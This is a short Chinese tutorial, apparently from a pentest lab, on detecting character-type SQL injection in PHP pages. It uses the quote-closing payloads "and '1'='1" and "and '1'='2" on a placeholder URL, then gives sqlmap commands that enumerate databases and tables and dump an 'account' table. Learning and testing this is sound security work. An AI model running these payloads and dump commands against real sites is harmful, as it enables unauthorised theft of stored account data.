字符型:
当输入的参数x为字符型时,通常在.php中SQL语句类型大致如下:
select * from <表名> where id = ‘x’
这种类型我们同样可以使用and ‘1’=‘1和and ‘1’ = ‘2来判断。
- Url 地址中输入 http://xxx/abc.php?id= x' and '1'='1 页面运行正常,继续进行下一步。
- Url 地址中继续输入 http://xxx/abc.php?id= x' and '1'='2 页面运行错误,则说明此 Sql 注入为字符型注入。
1、判断漏洞是否存在
闭合单引号,成功执行插入的语句,可根据响应数据不同判断存在的字符型SQL注入
2、利用sqlmap注入攻击进行漏洞利用
cd进入sqlmap所在文件夹
python sqlmap.py –u “url” –P 参数 --dbs
成功获取数据库pentest
3、通过sqlmap获取数据库pentest中的表
python sqlmap.py –u “url”-p 参数 –D 数据库名 –tables
获取account表和news表
4、account表就是包含我们需要信息的表,接下来获取表中的数据
python sqlmap.py -u “url”-p 参数 –D 数据库名 –T 表名 --dump
得到的数据:
(如有不足或者侵权的地方,请尽快联系我,我会及时修改或删除,非常感谢)
我们要以高涨的信心和喷涌的力量去战斗。加油吧,少年,去追求更好的自己!